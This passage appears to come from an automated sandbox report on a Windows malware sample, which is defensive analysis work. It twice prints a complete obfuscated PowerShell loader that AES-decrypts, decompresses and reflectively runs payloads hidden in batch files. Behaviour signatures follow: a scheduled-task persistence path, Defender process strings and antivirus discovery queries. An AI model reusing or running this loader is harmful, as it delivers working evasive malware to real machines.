Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\users\user\desktop\1 (2).cmd';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 40_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 40_2_0000000140002300
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\conhost.exe Code function: 20_3_000001B4448B2AF0 cpuid 20_3_000001B4448B2AF0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-1ktMxXBv VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-1ktMxXBv VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 40_2_0000000140002300
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B444908090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 20_2_000001B444908090
AV process strings found (often used to terminate AV products)
Source: powershell.exe, 00000008.00000002.1694896454.00000201CD248000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2711777669.000001B795D34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: dllhost.exe Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
